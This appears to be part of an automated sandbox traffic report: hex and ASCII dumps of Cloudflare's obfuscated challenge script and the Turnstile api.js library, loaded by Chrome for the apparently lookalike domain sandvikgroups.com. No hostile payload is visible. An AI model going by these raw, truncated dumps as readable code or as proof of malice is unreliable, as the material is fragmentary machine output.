                                        2025-01-07 21:05:57 UTC871INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:05:57 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 93719
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dzKBvyHzv5GC9CLY16RzkTU%2BLAjkPQ29G7GLyIStzC0DS88YJyZ7TZ9rF8vAO3LNrNG1xpad8LIWRghxYp5UN49QUxwprYJiVIjhnoz9Nz8wBabQO05ewEBYCmcTpyuW6m31fA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8ae3bc672a7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1998&rtt_var=751&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1593&delivery_rate=1454907&cwnd=177&unsent_bytes=0&cid=d096d654d2c8c08c&ts=145&x=0"
                                        2025-01-07 21:05:57 UTC498INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 74 72 75 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 7d 2c
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=true;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},
                                        2025-01-07 21:05:57 UTC1369INData Raw: 32 30 74 6f 25 32 30 67 65 74 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 64 65 73 69 72 65 64 25 32 30 70 61 67 65 2e 25 32 30 41 6c 74 65 72 6e 61 74 69 76 65 6c 79 25 32 43 25 32 30 74 72 79 25 32 30 67 6f 69 6e 67 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 72 6f 6f 74 25 32 30 6f 66 25 32 30 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 2e 22 2c 22 6c 6f 63 61 74 69 6f 6e 5f 6d 69 73 6d 61 74 63 68 5f 77 61 72 6e 69 6e 67 5f 61 75 78 22 3a 22 54 68 65 25 32 30 61 64 64 72 65 73 73 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 72 65 71 75 65 73 74 65 64 25 32 30 77 65 62 73 69 74 65 25 32 30 68 61 73 25 32 30 63 68 61 6e 67 65 64 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 74 25 32 30 61 63 63 65 73 73 69 62 6c 65 2e 25 32 30 54
                                        Data Ascii: 20to%20get%20to%20the%20desired%20page.%20Alternatively%2C%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","location_mismatch_warning_aux":"The%20address%20to%20the%20requested%20website%20has%20changed%20and%20is%20not%20accessible.%20T
                                        2025-01-07 21:05:57 UTC1369INData Raw: 74 65 78 74 5f 6f 76 65 72 72 75 6e 22 3a 22 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 25 32 30 74 6f 25 32 30 72 65 70 6c 79 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 69 6e 74 65 72 61 63 74 69 76 65 5f 72
                                        Data Ascii: text_overrun":"%25%7Bplaceholder.com%7D%20is%20taking%20longer%20than%20expected%20to%20reply.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","interactive_r
                                        2025-01-07 21:05:57 UTC1369INData Raw: 6f 72 25 32 30 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 22 2c 22 62 72 6f 77 73 65 72 5f 6e 6f 74 5f 73 75 70 70 6f 72 74 65 64 5f 61 75 78 22 3a 22 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 25 32 30 6e 65 65 64 73 25 32 30 74 6f 25 32 30 76 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 25 32 30 62 65 66 6f 72 65 25 32 30 70 72 6f 63 65 65 64 69 6e 67 2e 25 32 30 59 6f 75 72 25 32 30 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 37 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64
                                        Data Ascii: or%20%25%7Bplaceholder.com%7D","browser_not_supported_aux":"%25%7Bplaceholder.com%7D%20needs%20to%20verify%20you%20are%20human%20before%20proceeding.%20Your%20%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%27challenge.supported
                                        2025-01-07 21:05:57 UTC1369INData Raw: 32 30 68 75 6d 61 6e 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 66 61 6c 73 65 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 46 2c 65 4d 2c 65 4e 2c 65 55 2c 65 58 2c 65 5a
                                        Data Ascii: 20human"},"polyfills":{"feedback_report_output_subtitle":false,"turnstile_feedback_description":false,"turnstile_timeout":false,"testing_only_always_pass":false,"turnstile_overrun_description":false},"rtl":false,"lang":"en-us"};~function(gF,eM,eN,eU,eX,eZ
                                        2025-01-07 21:05:57 UTC1369INData Raw: 44 6d 6c 70 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 7d 29 3b 74 72 79 7b 69 66 28 6a 3d 65 54 28 66 5b 67 4e 28 34 39 35 29 5d 2c 66 5b 67 4e 28 31 30 31 39 29 5d 29 2c 66 5b 67 4e 28 34 39 35 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 7b 69 66 28 67 4e 28 37 30 39 29 3d 3d 3d 67 4e 28 31 31 34 34 29 29 7b 66 6f 72 28 4a 2c 47 3d 33 32 2c 49 3d 69 5b 67 4e 28 31 32 35 32 29 5d 28 6a 5b 67 4e 28 31 30 31 38 29 5d 5b 67 4e 28 31 33 30 39 29 5d 2b 27 5f 27 2c 30 29 2c 49 3d 49 5b 67 4e 28 31 30 30 38 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 4b 2c 4c 2c 67 4f 29 7b 67 4f 3d 67 4e 2c 47 5e 3d 49 5b 67 4f 28 33 33 31 29 5d 28 4c 29 7d 29 2c 6b 3d 6c 5b 67 4e 28 36 31 39 29 5d 28 6d 29 2c 48 3d 5b
                                        Data Ascii: Dmlp':function(E,F){return E+F}});try{if(j=eT(f[gN(495)],f[gN(1019)]),f[gN(495)]instanceof Error){if(gN(709)===gN(1144)){for(J,G=32,I=i[gN(1252)](j[gN(1018)][gN(1309)]+'_',0),I=I[gN(1008)](/./g,function(K,L,gO){gO=gN,G^=I[gO(331)](L)}),k=l[gN(619)](m),H=[
                                        2025-01-07 21:05:57 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2d 6f 7d 2c 27 69 68 57 51 45 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 26 6e 7d 2c 27 6f 7a 5a 63 54 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 5e 6f 7d 2c 27 4f 70 45 64 44 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2d 6f 7d 2c 27 6b 58 56 49 65 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 5e 6e 7d 2c 27 75 6f 58 59 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 2c 27 4f 63 73 44 55 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 45 68 42 4a 65 27 3a 67 50 28 39 36 33 29 2c 27 54 44 7a 4f 78 27 3a
                                        Data Ascii: nction(n,o){return n-o},'ihWQE':function(n,o){return o&n},'ozZcT':function(n,o){return n^o},'OpEdD':function(n,o){return n-o},'kXVIe':function(n,o){return o^n},'uoXYg':function(n,o){return n(o)},'OcsDU':function(n,o){return o===n},'EhBJe':gP(963),'TDzOx':
                                        2025-01-07 21:05:57 UTC1369INData Raw: 31 32 38 37 29 5d 3d 68 2c 6d 5b 67 50 28 31 30 37 31 29 5d 3d 69 2c 6d 5b 67 50 28 34 39 35 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 46 28 37 32 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 67 52 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 67 52 3d 67 46 2c 6a 3d 7b 7d 2c 6a 5b 67 52 28 39 30 38 29 5d 3d 67 52 28 33 33 38 29 2c 6a 5b 67 52 28 31 32 35 33 29 5d 3d 67 52 28 39 31 30 29 2c 6a 5b 67 52 28 38 38 39 29 5d 3d 67 52 28 38 36 39 29 2c 6b 3d 6a 2c 6c 3d 65 5b 67 52 28 39 38 37 29 5d 28 29 2c 6d 3d 6b 5b 67 52 28 31 32 35 33 29 5d 2c 6c 5b 67 52 28 36 32 35 29 5d 28 6d 29 3e 2d 31 29 3f 6b 5b 67 52 28 38 38 39 29 5d 3d 3d 3d 6b 5b 67 52 28 38 38 39 29 5d 3f 65 4d 5b 67 52 28 35 34 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 53 29
                                        Data Ascii: 1287)]=h,m[gP(1071)]=i,m[gP(495)]=d,m},eM[gF(725)]=function(e,f,g,h,i,gR,j,k,l,m,n,o){(gR=gF,j={},j[gR(908)]=gR(338),j[gR(1253)]=gR(910),j[gR(889)]=gR(869),k=j,l=e[gR(987)](),m=k[gR(1253)],l[gR(625)](m)>-1)?k[gR(889)]===k[gR(889)]?eM[gR(547)](function(gS)
                                        2025-01-07 21:05:57 UTC1369INData Raw: 2c 66 4d 5b 67 46 28 39 31 34 29 5d 3d 66 79 2c 66 4d 5b 67 46 28 31 33 30 36 29 5d 3d 66 6c 2c 66 4d 5b 67 46 28 38 34 36 29 5d 3d 66 4c 2c 66 4d 5b 67 46 28 31 31 35 38 29 5d 3d 66 6e 2c 66 4d 5b 67 46 28 38 34 33 29 5d 3d 66 72 2c 66 4d 5b 67 46 28 31 31 31 37 29 5d 3d 66 6f 2c 66 4d 5b 67 46 28 31 32 30 33 29 5d 3d 66 69 2c 66 4d 5b 67 46 28 33 37 35 29 5d 3d 66 68 2c 65 4d 5b 67 46 28 31 31 33 32 29 5d 3d 66 4d 2c 65 4d 5b 67 46 28 31 30 32 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 68 57 2c 65 29 7b 65 3d 28 68 57 3d 67 46 2c 7b 27 4b 6b 63 55 50 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 2c 27 6f 65 45 65 78 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72
                                        Data Ascii: ,fM[gF(914)]=fy,fM[gF(1306)]=fl,fM[gF(846)]=fL,fM[gF(1158)]=fn,fM[gF(843)]=fr,fM[gF(1117)]=fo,fM[gF(1203)]=fi,fM[gF(375)]=fh,eM[gF(1132)]=fM,eM[gF(1025)]=function(c,hW,e){e=(hW=gF,{'KkcUP':function(g,h){return g(h)},'oeEex':function(g,h){return g(h)}});tr
                                        2025-01-07 21:05:57 UTC1369INData Raw: 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 52 77 6f 45 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4e 63 72 67 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 61 6d 69 61 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 78 4d 44 7a 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6f 4c 69 6e 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 77 6c 71 61 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 49 63 64 5a 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e
                                        Data Ascii: (h,i){return i&h},'RwoEp':function(h,i){return h==i},'Ncrgj':function(h,i){return h(i)},'amiaH':function(h,i){return i==h},'xMDza':function(h,i){return i==h},'oLinx':function(h,i){return h|i},'wlqaF':function(h,i){return i==h},'IcdZo':function(h,i){return


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.449753104.18.95.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:58 UTC585OUTGET /turnstile/v0/g/849bfe45bf45/api.js?onload=FirmE4&render=explicit HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Origin: https://sandvikgroups.com
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: script
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:58 UTC471INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:05:58 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 47521
                                        Connection: close
                                        accept-ranges: bytes
                                        last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                        access-control-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8b3dcf28c2f-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:05:58 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                        2025-01-07 21:05:58 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                        Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                        2025-01-07 21:05:58 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                        2025-01-07 21:05:58 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                        2025-01-07 21:05:58 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                        2025-01-07 21:05:58 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                        Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                        2025-01-07 21:05:58 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                        Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
